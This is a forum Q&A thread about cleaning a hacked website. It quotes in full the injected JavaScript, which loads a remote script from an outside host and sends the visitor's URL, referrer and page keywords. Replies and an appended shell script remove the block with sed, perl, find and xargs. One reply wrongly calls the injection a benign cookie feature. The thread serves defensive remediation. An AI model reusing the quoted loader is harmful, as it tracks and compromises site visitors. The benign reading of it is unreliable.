  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 124

Remove a very long string from all files in Linux

Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup.

I had the following idea... All the files have the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

When I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and then somehow tell the system to remove said line from the file.

Any idea how I'd go about doing such a thing?
0
Asked by: David Sankovsky
1 Solution
 
gheist Commented:
Restore from backup and never ever let webserver modify content?
0
 
serialband Commented:
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, this will match the string and delete the entire line.  This outputs to stdout:
sed '/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file:
sed '/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file

If you want to do it inline and edit and replace the file, you add the inline option:
sed -i '/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
arnold Commented:
sed -i is a better approach compared to the /d since the string might not be the sole item on the line.

perl -pi.bak -e 's/pattern/replacementofany/g;' files
The -i.bak will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0

 
serialband Commented:
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
arnold Commented:
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -i.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a ColdFusion object, might the person have modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
David Sankovsky (Senior SysAdmin, Author) Commented:
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched files to whatever cleaning tool I chose (sed, perl, or whatever)?

I eventually used "find" to make sure I don't accidentally send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0
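
The find-and-xargs cleanup described in the last post, as an added example that is not part of the original thread. It goes one step further than deleting the whole line: it cuts only the injected block, so content sharing the line survives. The function names and the `.infected.bak` suffix are assumptions of this sketch, and it expects GNU find, xargs and sed.

```shell
#!/bin/sh
# Added example: strip the injected <script> block from files under a web root.

# Fixed-string and regex forms of the URL in the injected script quoted above.
MARKER='freedomfitnessandworkout.com/js/jquery.min.php'
MARKER_RE='freedomfitnessandworkout\.com/js/jquery\.min\.php'
# Start and end of the injected block; "." stands in for the quote characters.
HEAD='<script>var a=..;setTimeout(1);function setCookie'
TAIL='/script>.)));</script>'
BAK='.infected.bak'   # hypothetical backup suffix chosen for this example

# Count regular files that contain the marker (one dot printed per hit,
# so odd file names cannot skew the count). Backups are skipped.
count_infected() {
    find "$1" -type f ! -name "*$BAK" \
        -exec grep -qF -- "$MARKER" {} \; -exec printf . \; | wc -c | tr -d ' '
}

# Edit matching files in place, keeping each original as FILE.infected.bak.
# -type f keeps directories out of sed; -print0 / -0 keep names with spaces intact.
# Inside lines that carry the marker: cut the block, then drop the line if it
# is now blank. The match is greedy, so two copies on one line are cut together
# with whatever sits between them.
clean_tree() {
    find "$1" -type f ! -name "*$BAK" \
        -exec grep -qF -- "$MARKER" {} \; -print0 |
    xargs -0 -r sed -i"$BAK" \
        -e "\\|$MARKER_RE|{" \
        -e "s|$HEAD.*$MARKER_RE.*$TAIL||" \
        -e '/^[[:space:]]*$/d' \
        -e '}'
}

# Usage: sh clean.sh /path/to/webroot
if [ "$#" -eq 1 ]; then
    echo "infected before: $(count_infected "$1")"
    clean_tree "$1"
    # A non-zero count here means a variant that HEAD/TAIL did not match.
    echo "infected after:  $(count_infected "$1")"
fi
```

The `.infected.bak` copies still contain the injected script, so review them and move them out of the web root afterwards.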
